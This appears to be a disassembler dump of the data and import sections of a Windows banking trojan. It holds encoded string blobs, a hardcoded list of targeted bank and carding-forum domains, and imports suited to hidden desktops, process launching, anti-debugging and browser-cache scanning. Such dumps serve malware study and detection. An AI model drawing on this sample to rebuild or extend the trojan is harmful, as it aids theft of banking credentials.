byte_446383 db 10h ; DATA XREF: sub_405601+4A4�o
; sub_405601+5ED�o
dd 595C4245h, 55580C58h, 0E11495Ch, 58454849h, 4D5A0C0Eh
dd 11495940h, 0B5F090Bh, 414D420Ch, 90B1149h, 0B59095Fh
dd 5E4E1012h, 262112h
dword_4463B4 dd 5C424510h, 580C5859h, 11495C55h, 4548490Eh, 5A0C0E58h
; DATA XREF: sub_405601+312�o
dd 4959404Dh, 59090B11h, 4D420C0Bh, 0B114941h, 10120B4Dh
dd 21125E4Eh
db 26h, 0
word_4463E2 dw 4A10h ; DATA XREF: sub_405601+2CA�o
dd 0C415E43h, 45584F4Dh, 0E114243h, 0C0E5F09h, 44584941h
dd 0E114843h, 787F637Ch, 4D420C0Eh, 0E114941h, 120E5F09h
db 0
byte_44640D db 4Ah, 9, 2 ; DATA XREF: sub_405601+28C�o
db 1Fh, 59h, 0
byte_446413 db 10h ; DATA XREF: sub_405601+256�o
dd 5548434Eh
db 12h, 0
word_44641A dw 310h ; DATA XREF: sub_405601+233�o
dd 484D4944h
db 12h, 0
aMicrosoftCorp db 'MicroSoft-Corp',0 ; DATA XREF: sub_405601+1E9�o
; sub_4062CD+305�o
byte_446431 db 10h, 58h, 45h ; DATA XREF: sub_405601+1D9�o
dd 12494058h, 59095F09h, 45580310h, 12494058h
db 0
byte_446445 db 10h, 44h, 49h ; DATA XREF: sub_405601+1A9�o
dd 12484Dh
dword_44644C dd 41584410h db 40h, 12h, 0
byte_446453 db 2 ; DATA XREF: sub_405601+170�o
dd offset dword_415604+240h
a_OO db 9,'_',9,'O',9,'O',0 ; DATA XREF: sub_405527+6D�o
; sub_405601+41D�o
byte_44645F db 6 ; DATA XREF: sub_4053A1+A8�o
db 2, 6, 0
byte_446463 db 13h ; DATA XREF: sub_4053A1+39�o
db 0
byte_446465 db 1Ch, 14h, 5Dh ; DATA XREF: sub_404FEF+15A�o
db 44h, 0
off_44646A dd offset dword_445D14 ; DATA XREF: sub_404FEF+FF�o
word_44646E dw 4901h ; DATA XREF: sub_404FEF+A1�o
dd 59030114h, 3011449h, 1144959h, 14495903h, 49590301h
dd 59030114h, 3011449h
db 59h, 49h, 0
byte_44648F db 62h ; DATA XREF: sub_404FEF+5F�o
dd 445D141Ch
db 1Ch, 0
word_446496 dw 4350h ; DATA XREF: sub_404DE5+129�o
dd 1802090Fh, 521E09h
dword_4464A0 dd 2090F50h, 521E0918h db 0
byte_4464A9 db 50h, 43h, 0Ah ; DATA XREF: sub_404DE5+B9�o
dd 52180203h
db 0
byte_4464B1 db 50h, 43h, 19h ; DATA XREF: sub_404DE5+7E�o
db 52h, 0
word_4464B6 dw 4350h ; DATA XREF: sub_404DE5+49�o
db 0Eh, 52h, 0
byte_4464BB db 50h ; DATA XREF: sub_404DE5+4�o
dd 520543h
dword_4464C0 dd 520550h dword_4464C4 dd 521950h dword_4464C8 dd 520E50h dword_4464CC dd 521E0E50h db 0
aAarl db 'AARL',0 ; DATA XREF: sub_404A38+129�o
aPmaal db 'PMAAL',0 ; DATA XREF: sub_40494F+8D�o
aAf db 'af',0 ; DATA XREF: sub_404878+A1�o
; sub_404DE5+151�o
byte_4464DF db 43h ; DATA XREF: sub_404878�o
dd 490F4943h, 610F490Fh
db 66h, 0
word_4464EA dw 0D1Ah ; DATA XREF: sub_404663+12E�o
dd 0F494C1Eh, 0F490F49h, 494C514Ch
db 19h, 57h, 0
off_4464FB dd offset dword_43464C ; DATA XREF: sub_404663+F7�o
byte_4464FF db 49h ; DATA XREF: sub_404663+92�o
; sub_404A38-1A�o ...
dd 0F491Fh
dword_446504 dd 4C4643h aBlind_user db 'blind_user',0 ; DATA XREF: sub_404527+50�o
; sub_4045B7+C�o
aINvuni db 'ލ',0 ; DATA XREF: sub_404194+299�o
; sub_409847+B6E�o
aCAzaNiUAzaNNiN db 'ݠޓˍٍލݠޓ',0
; DATA XREF: sub_404194+22B�o
word_446556 dw 0CEF1h ; DATA XREF: sub_404194+1B7�o
; sub_409847+B3C�o
aG_0 db 'Ƀ',0
byte_446563 db 88h ; DATA XREF: sub_404194+197�o
; sub_409847+B09�o
dd 0C2CEF1DEh, 0C3CCC0C0h, 0C4DD83C9h
db 0CBh, 0
word_446572 dw 0DE88h ; DATA XREF: sub_404194+172�o
dd 0C1DED5F1h, 94C1C9CBh, 0CCCF83D5h
db 0D9h, 0
word_446582 dw 0CEF1h ; DATA XREF: sub_404194+139�o
; sub_409847+AC2�o
aG_1 db 'Ƀ',0
byte_44658B db 88h ; DATA XREF: sub_404194+119�o
; sub_409847+AA2�o
dd 0C0CEF1DEh, 0C4DD83C9h
db 0CBh, 0
word_446596 dw 0DE88h ; DATA XREF: sub_404194+F9�o
dd 0C1DED5F1h, 0C3C1C9CBh, 0CCCF83D9h
db 0D9h, 0
word_4465A6 dw 0E0DCh ; DATA XREF: sub_403C5F+3AC�o
dd 0EEF8FBE9h, 0C2D3EAFDh, 0E0FDECE6h, 0FBE9E0FCh, 0E1E6D8D3h
dd 0FCF8E0EBh, 0FDFACCD3h, 0FBE1EAFDh, 0FCFDEAD9h, 0D3E1E0E6h
dd 0E3EAE7DCh, 0FDEADCE3h, 0EAECE6F9h, 0EAE5EDC0h, 0EACBFBECh
dd 0C3F6EEE3h, 0EBEEE0h
dword_4465EC dd 0FDEEFFCEh, 0E1EAE2FBh db 0FBh, 0
word_4465F6 dw 0E7DBh ; DATA XREF: sub_403C5F+370�o
dd 0EBEEEAFDh, 0C2E8E1E6h, 0E3EAEBE0h
db 0
byte_446605 db 0 ; DATA XREF: sub_403C5F+337�o
; sub_405F79+2F9�o ...
word_446606 dw 0C3CCh ; DATA XREF: sub_403C5F+304�o
dd 0D3CBC6DCh, 0C6D3FCAAh, 0E0FDDFE1h, 0FDEADCECh, 0BCFDEAF9h
db 0BDh, 0
word_44661E dw 0FCAAh ; DATA XREF: sub_403C5F+24B�o
dd 0A1FCAAD3h, 0E3E3EBh
dword_446628 dd 0BBBFAAF4h, 0BBBFAAD7h, 0BFAAA2D7h, 0AAA2D7BBh, 0A2D7BBBFh
; DATA XREF: sub_403C5F+40�o
dd 0D7BBBFAAh, 0BBBFAAA2h, 2 dup(0BBBFAAD7h)
db 0D7h, 0F2h, 0
byte_44664F db 0AFh ; DATA XREF: sub_403AA3+14F�o
db 0
byte_446651 db 0AAh, 0FCh, 0D3h ; DATA XREF: sub_403AA3+6E�o
dd 0EAA1FCAAh
db 0F7h, 0EAh, 0
aK db '',0 ; DATA XREF: sub_4039D6+86�o
asc_446660 db '$',0 ; DATA XREF: sub_4037EF+42�o
; .text:004038C2�o
word_446662 dw 1Eh ; DATA XREF: sub_4036F2+32�o
byte_446664 db 7Eh, 0 ; DATA XREF: sub_403610+9C�o
word_446666 dw 6C10h ; DATA XREF: sub_403449+4B�o
; sub_4034D8+41�o
db 0
aChevychasebank db 'chevychasebank.com',0 ; DATA XREF: .data:0043B1D8�o
aGronxplanets_r db 'gronxplanets.ru',0 ; DATA XREF: .data:0043B1D4�o
aWww_mdmbank_ru db 'www.mdmbank.ru',0 ; DATA XREF: .data:0043B1D0�o
aFethard_biz db 'fethard.biz',0 ; DATA XREF: .data:0043B1CC�o
aRoyalbank_com db 'royalbank.com',0 ; DATA XREF: .data:0043B1C8�o
aSecuritylab_ru db 'securitylab.ru',0 ; DATA XREF: .data:0043B1C4�o
aTatNeftbank_ru db 'tat-neftbank.ru',0 ; DATA XREF: .data:0043B1C0�o
aSeclab_ru db 'seclab.ru',0 ; DATA XREF: .data:0043B1BC�o
aOpenbank_com db 'openbank.com',0 ; DATA XREF: .data:0043B1B8�o
aGutabank_ru db 'gutabank.ru',0 ; DATA XREF: .data:0043B1B4�o
aWww_b2bTrust_c db 'www.b2b-trust.com',0 ; DATA XREF: .data:0043B1B0�o
aGrepwareFacili db 'grepware-facility.ru',0 ; DATA XREF: .data:0043B1AC�o
aWww_uralsib_ru db 'www.uralsib.ru',0 ; DATA XREF: .data:0043B1A8�o
a53bank_com db '53bank.com',0 ; DATA XREF: .data:0043B1A4�o
aWww_nbc_caInde db 'www.nbc.ca/index.php',0 ; DATA XREF: .data:0043B1A0�o
aTotallyfreeban db 'totallyfreebanking.com',0 ; DATA XREF: .data:0043B19C�o
aBarclays_com db 'barclays.com',0 ; DATA XREF: .data:0043B198�o
aWww_lbcdirect_ db 'www.lbcdirect.laurentianbank.ca/index.php',0
; DATA XREF: .data:0043B194�o
aKidosBank_ru db 'kidos-bank.ru',0 ; DATA XREF: .data:0043B190�o
aYambo_biz db 'yambo.biz',0 ; DATA XREF: .data:0043B18C�o
aProrat_net db 'prorat.net',0 ; DATA XREF: .data:0043B188�o
aWww1_hsbc_caIn db 'www1.hsbc.ca/index.php',0 ; DATA XREF: .data:0043B184�o
aWww_ovk_ru db 'www.ovk.ru',0 ; DATA XREF: .data:0043B180�o
aWww_rbc_com db 'www.rbc.com',0 ; DATA XREF: .data:0043B17C�o
aMasterX_comFor db 'master-x.com/forum/',0 ; DATA XREF: .data:0043B178�o
aWww_allahabadb db 'www.allahabadbank.com',0 ; DATA XREF: .data:0043B174�o
aOnlineBusiness db 'online-business.lloydstsb.co.uk',0 ; DATA XREF: .data:0043B170�o
aMyonlineaccoun db 'myonlineaccounts2.abbeynational.co.uk',0 ; DATA XREF: .data:0043B16C�o
aWww_absolutban db 'www.absolutbank.ru',0 ; DATA XREF: .data:0043B168�o
aKavkazcenter_c db 'kavkazcenter.com/russ',0 ; DATA XREF: .data:0043B164�o
aWww_netmagiste db 'www.netmagister.com',0 ; DATA XREF: .data:0043B160�o
aWww_kmb_ru db 'www.kmb.ru',0 ; DATA XREF: .data:0043B15C�o
aWww_spyinstruc db 'www.spyinstructors.com',0 ; DATA XREF: .data:0043B158�o
aAcroleinHawk_r db 'acrolein-hawk.rubanking.halifax-online.co.uk',0
; DATA XREF: .data:0043B154�o
aWww_icbank_ru db 'www.icbank.ru',0 ; DATA XREF: .data:0043B150�o
aWww_bankofindi db 'www.bankofindia.com',0 ; DATA XREF: .data:0043B14C�o
aPizdabolInc_ru db 'pizdabol-inc.ru',0 ; DATA XREF: .data:0043B148�o
aWww_sbrf_ru db 'www.sbrf.ru',0 ; DATA XREF: .data:0043B144�o
aWww_candidatev db 'www.candidateverifier.com/index.php',0 ; DATA XREF: .data:0043B140�o
aWww_worldbank_ db 'www.worldbank.org/index.php',0 ; DATA XREF: .data:0043B13C�o
aDigitalRelaxkg db 'digital-relaxkgb.ru',0 ; DATA XREF: .data:0043B138�o
aAsmworm_com db 'asmworm.com',0 ; DATA XREF: .data:0043B130�o
aAtmacasoft_com db 'atmacasoft.com',0 ; DATA XREF: .data:0043B12C�o
aCrutop_nuVbu_1 db 'crutop.nu/vbulletin/showthread.php',0 ; DATA XREF: .data:0043B128�o
aWww_uniastrum_ db 'www.uniastrum.ru',0 ; DATA XREF: .data:0043B124�o
aCrutop_nuVbu_0 db 'crutop.nu/vbulletin/forumdisplay.php',0 ; DATA XREF: .data:0043B120�o
aWww_mmbank_ru db 'www.mmbank.ru',0 ; DATA XREF: .data:0043B11C�o
aCrutop_nuVbull db 'crutop.nu/vbulletin/',0 ; DATA XREF: .data:0043B118�o
aAlfabank_ru db 'alfabank.ru',0 ; DATA XREF: .data:0043B114�o
aHyperSpaceFuel db 'hyper-space-fuel.ru',0 ; DATA XREF: .data:0043B110�o
aWww_cwbank_com db 'www.cwbank.com',0 ; DATA XREF: .data:0043B10C�o
aWww_vtb_ru db 'www.vtb.ru',0 ; DATA XREF: .data:0043B108�o
aWww_cibc_com db 'www.cibc.com',0 ; DATA XREF: .data:0043B104�o
aWww_bankofmadu db 'www.bankofmadura.com',0 ; DATA XREF: .data:0043B100�o
aWww_bmo_com db 'www.bmo.com',0 ; DATA XREF: .data:0043B0FC�o
aWww_bankBanque db 'www.bank-banque-canada.ca/index.php',0 ; DATA XREF: .data:0043B0F8�o
aWww_masterbank db 'www.masterbank.ru',0 ; DATA XREF: .data:0043B0F4�o
aEbookfinaltras db 'ebookfinaltrash.ru',0 ; DATA XREF: .data:0043B0F0�o
aMasterX_com db 'master-x.com',0 ; DATA XREF: .data:0043B0EC�o
aWww_bbin_ru db 'www.bbin.ru',0 ; DATA XREF: .data:0043B0E8�o
aOlb2_nationet_ db 'olb2.nationet.com',0 ; DATA XREF: .data:0043B0E4�o
aWelcome3_smile db 'welcome3.smile.co.uk',0 ; DATA XREF: .data:0043B0E0�o
aWww_baltbank_r db 'www.baltbank.ru',0 ; DATA XREF: .data:0043B0DC�o
aNew_egg_com db 'new.egg.com',0 ; DATA XREF: .data:0043B0D8�o
aProdexteam_n_1 db 'prodexteam.netcrutop.nu',0 ; DATA XREF: .data:0043B0D4�o
aWww_proxySocks db 'www.proxy-socks.net',0 ; DATA XREF: .data:0043B0D0�o
; .data:0043B134�o
aWww_cbr_ru db 'www.cbr.ru',0 ; DATA XREF: .data:0043B0CC�o
aProdexteam_n_0 db 'prodexteam.net/main.htm',0 ; DATA XREF: .data:0043B0C8�o
aProdexteam_net db 'prodexteam.net',0 ; DATA XREF: .data:0043B0C4�o
aChechenpress_i db 'chechenpress.info',0 ; DATA XREF: .data:0043B0C0�o
aSiliconfirewar db 'siliconfireware.ru',0 ; DATA XREF: .data:off_43B0BC�o
align 4
dword_446BA4 dd 332C4425h, 11D026CBh, 0C00083B4h, 1901D94Fhdword_446BB4 dd 3050F1FFh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; sub_406E2B+94F�o
dword_446BC4 dd 3050F1F7h, 11CF98B5h, 0AA0082BBh, 0BCEBD00hdword_446BD4 dd 332C4427h, 11D026CBh, 0C00083B4h, 1901D94Fhdword_446BE4 dd 85CB6900h, 11CF4D95h, 80000C96h, 85EEF4C7hdword_446BF4 dd 2 dup(0) dd 0C0h, 46000000h
dword_446C04 dd 0D30C1661h, 11D0CDAFh, 0C0003E8Ah, 6EE2C94Fhdword_446C14 dd 10h dup(0) ; sub_40BABC:loc_40BAD6�o ...
dword_446C54 dd 0 ; sub_40BA60:loc_40BAA2�o ...
dd 0Fh dup(0)
dword_446C94 dd 0 ; sub_40BBC5+825�r
dword_446C98 dd 0 ; sub_40BBC5+82C�r
dword_446C9C dd 0 ; sub_40BBC5+834�r
dword_446CA0 dd 0 ; sub_40BBC5+83C�r
align 400h
_data ends
; Section 4. (virtual address 00047000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00047000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata segment para public 'DATA' use32
assume cs:_idata
;org 447000h
off_447000 dd offset dword_44710C ; DATA XREF: .idata:00447E00�o
dd 2 dup(0)
dd offset dword_44710C
dd offset dword_44710C
off_447014 dd offset dword_44711C ; DATA XREF: .idata:00447E10�o
; .idata:00447E14�o
align 10h
dd offset dword_44711C
dd offset dword_44711C
off_447028 dd offset dword_447134 ; DATA XREF: .idata:00447E24�o
; .idata:00447E28�o ...
dd 2 dup(0)
dd offset dword_447134
dd offset dword_447134
off_44703C dd offset dword_447214 ; DATA XREF: .idata:00447E44�o
; .idata:00447E48�o ...
dd 2 dup(0)
dd offset dword_447214
dd offset dword_447214
off_447050 dd offset dword_447290 ; DATA XREF: .idata:00447F28�o
; .idata:00447F2C�o ...
dd 2 dup(0)
dd offset dword_447290
dd offset dword_447290
off_447064 dd offset dword_4472AC ; DATA XREF: .idata:00447FA8�o
; .idata:00447FAC�o ...
align 10h
dd offset dword_4472AC
dd offset dword_4472AC
off_447078 dd offset dword_4472E8 ; DATA XREF: .idata:00447FCC�o
; .idata:00447FD0�o ...
dd 2 dup(0)
dd offset dword_4472E8
dd offset dword_4472E8
off_44708C dd offset dword_447338 ; DATA XREF: .idata:0044800C�o
; .idata:00448010�o ...
dd 2 dup(0)
dd offset dword_447338
dd offset dword_447338
dd 1Ah dup(0)
dd 47574h
dword_44710C dd 2 dup(0) ; .idata:0044700C�o ...
dd 47588h, 475A4h
dword_44711C dd 2 dup(0) ; .idata:00447020�o ...
dd 475C0h, 475D4h, 475E8h, 475F8h
dword_447134 dd 2 dup(0) ; .idata:00447034�o ...
dd 4760Ch, 4761Ch, 47638h, 4764Ch, 47664h, 4767Ch, 4768Ch
dd 4769Ch, 476ACh, 476C4h, 476D8h, 476E8h, 476FCh, 47710h
dd 47728h, 47738h, 47748h, 47758h, 47768h, 47780h, 47798h
dd 477ACh, 477C0h, 477D4h, 477ECh, 477F8h, 47810h, 47820h
dd 47830h, 47844h, 47854h, 47864h, 47870h, 47880h, 47890h
dd 478A0h, 478ACh, 478B8h, 478C8h, 478DCh, 478ECh, 478FCh
dd 47904h, 47918h, 47928h, 47938h, 47948h, 4795Ch, 47974h
dd 47980h, 4798Ch, 47998h, 479A4h, 479B4h
dword_447214 dd 2 dup(0) ; .idata:00447048�o ...
dd 479C4h, 479D8h, 479E8h, 479F8h, 47A04h, 47A14h, 47A20h
dd 47A38h, 47A48h, 47A54h, 47A60h, 47A74h, 47A84h, 47A94h
dd 47AA8h, 47ABCh, 47AD0h, 47AE4h, 47AF8h, 47B0Ch, 47B20h
dd 47B30h, 47B3Ch, 47B50h, 47B60h, 47B74h, 47B84h, 47B94h
dd 47BA8h
dword_447290 dd 2 dup(0) ; .idata:0044705C�o ...
dd 47BBCh, 47BD0h, 47BE0h, 47BF0h, 47C08h
dword_4472AC dd 2 dup(0) ; .idata:00447070�o ...
dd 47C18h, 47C2Ch, 47C44h, 47C58h, 47C68h, 47C78h, 47C8Ch
dd 47CA0h, 47CB4h, 47CC8h, 47CDCh, 47CF8h, 47D10h
dword_4472E8 dd 2 dup(0) ; .idata:00447084�o ...
dd 47D2Ch, 47D34h, 47D44h, 47D50h, 47D5Ch, 47D64h, 47D6Ch
dd 47D78h, 47D84h, 47D90h, 47D98h, 47DA0h, 47DACh, 47DB8h
dd 47DC0h, 47DCCh, 47DD8h, 47DE4h
dword_447338 dd 2 dup(0) ; .idata:00447098�o ...
dword_447340 dd 77124C05h dd 2 dup(0)
dword_44734C dd 42C2DE3Dh ; resolved to->WININET.FindFirstUrlCacheEntryAdword_447350 dd 42C2E399h ; resolved to->WININET.FindNextUrlCacheEntryA dd 2 dup(0)
dword_44735C dd 774FFAC3h dword_447360 dd 7750CB9Ch dword_447364 dd 77502A37h dword_447368 dd 774FEE36h dd 2 dup(0)
dword_447374 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcessdword_447378 dd 7C8329D9h ; resolved to->KERNEL32.ExpandEnvironmentStringsAdword_44737C dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_447380 dd 7C809920h ; resolved to->KERNEL32.GetCurrentProcessIddword_447384 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadIddword_447388 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_44738C dd 7C831C45h ; resolved to->KERNEL32.GetFileTimedword_447390 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_447394 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_447398 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_44739C dd 7C809B47h ; resolved to->KERNEL32.CloseHandledword_4473A0 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_4473A4 dd 7C80ABC1h ; resolved to->KERNEL32.GetProcessHeapdword_4473A8 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryAdword_4473AC dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathAdword_4473B0 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_4473B4 dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_4473B8 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExAdword_4473BC dd 7C821BA5h ; resolved to->KERNEL32.GetVolumeInformationAdword_4473C0 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_4473C4 dd 7C8360A9h ; resolved to->KERNEL32.GlobalAddAtomAdword_4473C8 dd 7C830BBBh ; resolved to->KERNEL32.GlobalDeleteAtomdword_4473CC dd 7C8360C3h ; resolved to->KERNEL32.GlobalFindAtomAdword_4473D0 dd 7C8310F2h ; resolved to->KERNEL32.GlobalMemoryStatusdword_4473D4 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_4473D8 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrementdword_4473DC dd 7C809E01h ; resolved to->KERNEL32.IsBadReadPtrdword_4473E0 dd 7C809E79h ; resolved to->KERNEL32.IsBadWritePtrdword_4473E4 dd 7C813093h ; resolved to->KERNEL32.IsDebuggerPresentdword_4473E8 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_4473EC dd 7C80998Dh ; resolved to->KERNEL32.LocalAllocdword_4473F0 dd 7C80992Fh ; resolved to->KERNEL32.LocalFreedword_4473F4 dd 7C80EA1Bh ; resolved to->KERNEL32.OpenMutexAdword_4473F8 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcessdword_4473FC dd 7C801A24h ; resolved to->KERNEL32.CreateFileAdword_447400 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_447404 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_447408 dd 7C90311Bh ; resolved to->NTDLL.RtlZeroMemorydword_44740C dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointerdword_447410 dd 7C831CB8h ; resolved to->KERNEL32.SetFileTimedword_447414 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_447418 dd 7C802442h ; resolved to->KERNEL32.Sleepdword_44741C dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_447420 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_447424 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_447428 dd 7C80B9D1h ; resolved to->KERNEL32.VirtualQuerydword_44742C dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_447430 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiBytedword_447434 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_447438 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_44743C dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenAdword_447440 dd 7C809A09h ; resolved to->KERNEL32.lstrlenWdword_447444 dd 7C810637h ; resolved to->KERNEL32.CreateThreaddword_447448 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA dd 2 dup(0)
dword_447454 dd 7E43212Bh ; resolved to->USER32.GetWindowTextAdword_447458 dd 7E41B6D4h ; resolved to->USER32.GetWindowRectdword_44745C dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_447460 dd 7E41BC7Dh ; resolved to->USER32.GetWindowdword_447464 dd 7E42F420h ; resolved to->USER32.GetClassNameAdword_447468 dd 7E41DA60h ; resolved to->USER32.SetFocusdword_44746C dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_447470 dd 7E41EF69h ; resolved to->USER32.LoadCursorAdword_447474 dd 7E4208CEh ; resolved to->USER32.LoadIconAdword_447478 dd 7E418C2Eh ; resolved to->USER32.SetTimerdword_44747C dd 7E420A36h ; resolved to->USER32.RegisterClassAdword_447480 dd 7E45058Ah ; resolved to->USER32.MessageBoxAdword_447484 dd 7E42E002h ; resolved to->USER32.GetMessageAdword_447488 dd 7E41945Dh ; resolved to->USER32.GetWindowLongAdword_44748C dd 7E41D60Dh ; resolved to->USER32.SetWindowLongAdword_447490 dd 7E455BD7h ; resolved to->USER32.CreateDesktopAdword_447494 dd 7E42E8D1h ; resolved to->USER32.SetThreadDesktopdword_447498 dd 7E419A51h ; resolved to->USER32.GetThreadDesktopdword_44749C dd 7E418BF6h ; resolved to->USER32.TranslateMessagedword_4474A0 dd 7E4196B8h ; resolved to->USER32.DispatchMessageAdword_4474A4 dd 7E42F383h ; resolved to->USER32.SendMessageAdword_4474A8 dd 7E41A8ADh ; resolved to->USER32.wsprintfAdword_4474AC dd 7E42E1D1h ; resolved to->USER32.PostQuitMessagedword_4474B0 dd 7E41D8A4h ; resolved to->USER32.ShowWindowdword_4474B4 dd 7E41FF33h ; resolved to->USER32.CreateWindowExAdword_4474B8 dd 7E41DAEAh ; resolved to->USER32.DestroyWindowdword_4474BC dd 7E41DBECh ; resolved to->USER32.MoveWindowdword_4474C0 dd 7E41D4EEh ; resolved to->USER32.DefWindowProcAdword_4474C4 dd 7E41F642h ; resolved to->USER32.CallWindowProcA align 10h
dword_4474D0 dd 77F161D1h ; resolved to->GDI32.GetStockObjectdword_4474D4 dd 77F15E39h ; resolved to->GDI32.SetBkColordword_4474D8 dd 77F15D87h ; resolved to->GDI32.SetTextColordword_4474DC dd 77F1D991h ; resolved to->GDI32.CreateBrushIndirectdword_4474E0 dd 77F3B730h ; resolved to->GDI32.CreateFontA dd 2 dup(0)
dword_4474EC dd 77DD7753h ; resolved to->ADVAPI32.OpenProcessTokendword_4474F0 dd 77DD7B76h ; resolved to->ADVAPI32.GetTokenInformationdword_4474F4 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_4474F8 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKeydword_4474FC dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExAdword_447500 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_447504 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_447508 dd 77DF08D5h ; resolved to->ADVAPI32.GetSecurityInfodword_44750C dd 77DF087Fh ; resolved to->ADVAPI32.SetSecurityInfodword_447510 dd 77E215D9h ; resolved to->ADVAPI32.SetEntriesInAclAdword_447514 dd 77DFD4B0h ; resolved to->ADVAPI32.GetSidIdentifierAuthoritydword_447518 dd 77DF9839h ; resolved to->ADVAPI32.GetSidSubAuthoritydword_44751C dd 77DF986Bh ; resolved to->ADVAPI32.GetSidSubAuthorityCount dd 2 dup(0)
dword_447528 dd 73D96FEBh dword_44752C dd 73D91C28h dword_447530 dd 73D92B86h dword_447534 dd 73D9A3B0h dword_447538 dd 73D9B9A2h dword_44753C dd 73D91F60h dword_447540 dd 73D9D320h dword_447544 dd 73D9D340h dword_447548 dd 73D9D5E0h dword_44754C dd 73D9242Ch dword_447550 dd 73D9DBAFh dword_447554 dd 73D92226h dword_447558 dd 73D9E5C5h dword_44755C dd 73D9DBA2h dword_447560 dd 73D9E61Eh dword_447564 dd 73D9E65Ch dword_447568 dd 73D9E69Ch dword_44756C dd 73D9F24Ch dd 0
dd 79530046h, 6C6C4173h, 7453636Fh, 676E6972h, 0
dd 69460015h, 6946646Eh, 55747372h, 61436C72h, 45656863h
dd 7972746Eh, 41h, 6946001Ch, 654E646Eh, 72557478h, 6361436Ch
dd 6E456568h, 41797274h, 0
dd 6F43006Ah, 61657243h, 6E496574h, 6E617473h, 6563h, 4C43007Ch
dd 46444953h, 536D6F72h, 6E697274h, 67h, 6F430058h, 74696E49h
dd 696C6169h, 657Ah, 6F43005Bh, 6E696E55h, 61697469h, 657A696Ch
dd 0
dd 78450081h, 72507469h, 7365636Fh, 73h, 78450083h, 646E6170h
dd 69766E45h, 6D6E6F72h, 53746E65h, 6E697274h, 417367h
dd 654700CAh, 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 654700DEh
dd 72754374h, 746E6572h, 636F7250h, 49737365h, 64h, 654700E0h
dd 72754374h, 746E6572h, 65726854h, 64496461h, 0
dd 654700F8h, 6C694674h, 7A695365h, 65h, 654700FAh, 6C694674h
dd 6D695465h, 65h, 65470100h, 73614C74h, 72724574h, 726Fh
dd 6547010Ah, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
dd 6547010Ch, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 6C43001Bh
dd 4865736Fh, 6C646E61h, 65h, 65470122h, 6F725074h, 64644163h
dd 73736572h, 0
dd 65470124h, 6F725074h, 73736563h, 70616548h, 0
dd 6547013Fh, 73795374h, 446D6574h, 63657269h, 79726F74h
dd 41h, 6547014Dh, 6D655474h, 74615070h, 4168h, 65470155h
dd 63695474h, 756F436Bh, 746Eh, 6547015Ch, 72655674h, 6E6F6973h
dd 0
dd 6547015Dh, 72655674h, 6E6F6973h, 417845h, 6547015Fh
dd 6C6F5674h, 49656D75h, 726F666Eh, 6974616Dh, 416E6Fh
dd 65470165h, 6E695774h, 73776F64h, 65726944h, 726F7463h
dd 4179h, 6C470168h, 6C61626Fh, 41646441h, 416D6F74h, 0
dd 6C47016Ch, 6C61626Fh, 656C6544h, 74416574h, 6D6Fh, 6C47016Dh
dd 6C61626Fh, 646E6946h, 6D6F7441h, 41h, 6C470176h, 6C61626Fh
dd 6F6D654Dh, 74537972h, 73757461h, 0
dd 6F430025h, 69467970h, 41656Ch, 6E490194h, 6C726574h
dd 656B636Fh, 636E4964h, 656D6572h, 746Eh, 73490198h, 52646142h
dd 50646165h, 7274h, 7349019Bh, 57646142h, 65746972h, 727450h
dd 7349019Eh, 75626544h, 72656767h, 73657250h, 746E65h
dd 6F4C01A7h, 694C6461h, 72617262h, 4179h, 6F4C01ADh, 416C6163h
dd 636F6C6Ch, 0
dd 6F4C01B1h, 466C6163h, 656572h, 704F01D2h, 754D6E65h
dd 41786574h, 0
dd 704F01D4h, 72506E65h, 7365636Fh, 73h, 72430031h, 65746165h
dd 656C6946h, 41h, 655201FAh, 69466461h, 656Ch, 7452020Eh
dd 776E556Ch, 646E69h, 7452020Fh, 72655A6Ch, 6D654D6Fh
dd 79726Fh, 6553023Ah, 6C694674h, 696F5065h, 7265746Eh
dd 0
dd 6553023Ch, 6C694674h, 6D695465h, 65h, 7243003Ch, 65746165h
